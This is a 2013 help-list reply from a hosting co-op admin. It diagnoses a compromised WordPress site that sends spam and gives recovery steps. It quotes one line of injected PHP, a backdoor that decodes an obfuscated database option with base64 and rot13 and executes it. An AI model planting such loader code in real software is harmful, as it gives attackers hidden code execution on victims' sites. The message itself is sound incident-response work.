[HCoop-Help] wordpress spam, failed mail delivery notices.

Clinton Ebadi clinton at unknownlamer.org
Fri May 17 22:39:10 EDT 2013

Yagnesh Raghava Yakkala <yagnesh at hcoop.net> writes:

> Hello all,
>
> My inbox is getting filled with mail delivery failure notices today (similar
> to the attached mail). It looks like it has something to do with akismet spam
> filter on my wordpress site (sapporoindians.com). I don't understand the
> problem.
>
> Any insights would great on:
> - how to know which program is initiating mail delivery
> - how to stop receiving failure notices to my inbox
>
> FYI, I haven't touched anything on my site for a long while now.

Ack, Jesse is right -- your site has most definitely been hacked!

This code is in a few files:

$z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ $_z=create_function("",$z); @$_z(); }

First, your wp-content directory is allowing ANYONE in the entire world
to write to it via afs... did you accidentally grant system:anyuser
write permissions when trying to do something else (I know the plugin
installer does not work unless your daemon user can writer to
wp-content)?

Then there is the telltale chmod 777 (that does nothing, since we are
using afs).

The file modification dates indicate that your site was likely
compromised on the first of May.

To mitigate the immediate problem (loading your site sends spam!) I
moved the site out of the way; from what I can tell you will need to
restore the database from a backup and re-install wordpress entirely:

        http://codex.wordpress.org/FAQ_My_site_was_hacked

Including changing your database password, wordpress passwords, etc. If
you do not have a database backup, you'll want to check your database
for any odd looking tables or values. I think the only damage done to
your db was inserting a few rows in the options table. If possible, you
may want to dump only posts/comment data and re-import that.

If you file a bugzilla bug, I will offer what assistance I can with
fixing your site. Luckily, it appears that the attackers did not manage
to further compromise the system or your account. Whatever you do, do
not delete the compromised files (yet).

I am going to spend some time analyzing what their code does... it is
stored as an obfuscated item in the options table. My plan is to dump
the options table and decode the function source to figure out what
exactly they were trying to do. Luckily, the outgoing mail log seems to
indicate that they were not very successful in sending much spam, but
you never know what script kiddies might be up to.

--
unknownlamer: Hail Satan
unknownlamer: And do drugs